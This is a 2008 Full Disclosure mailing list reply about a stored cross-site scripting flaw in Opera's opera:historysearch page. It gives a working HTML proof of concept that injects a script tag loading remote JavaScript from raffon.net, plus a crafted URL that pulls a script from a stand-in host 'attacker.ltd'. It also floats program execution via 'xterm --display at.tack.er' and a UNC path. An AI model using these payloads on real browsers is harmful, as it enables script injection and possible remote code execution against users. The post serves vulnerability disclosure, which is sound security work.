Full Disclosure mailing list archives

Re: Opera Stored Cross Site Scripting

From: Stefano Di Paola <stefano.dipaola () wisec it>
Date: Thu, 23 Oct 2008 12:34:26 +0200

Good job Aviv :)

that's exactly what I intended when I said:
"..
On linux/Macos probably some program execution could be done using xterm
--display at.tack.er in place of telnet program.

Also maybe under windows some \\att.tack.er\program.exe ?
.."

Roberto, for the q=Xss I found, just use the following html :

-------

<script>
function x() {
  window.open('opera:historysearch?q=%2A"><script+src%3d"http:%%32f%%
32fwww.raffon.net%%32fresearch%%32fopera%%32fhistory%%32fo.js"><%%
32fscript>&p=1&s=1');
  setTimeout(function(){window.open('mailto:abc&apos;)},500);
}
</script>
<h3>opera:historysearch?q=%2AXssHere POC</h3>
Wait for 10 seconds<br>
Using the js from Aviv: <br>
http://www.raffon.net/research/opera/history/o.js <br>
The string for cache retrieve: <br>
<b>&lt;script
src='http://www.raffon.net/research/opera/history/o.js'&gt;&lt;/script&gt;</b>

------

That will allow the attacker to find the script code in
opera:historysearch.

Then, since opera adds link for next/previous page using the s=20, p=1
and q=query, you can force the victim to go to:

opera:historysearch?q=*"><script+src="http:%%32f%%32fattacker.ltd%%
32fs.js"><%%32fscript>*&s=1&p=1

Which will display the next page link and will trigger the script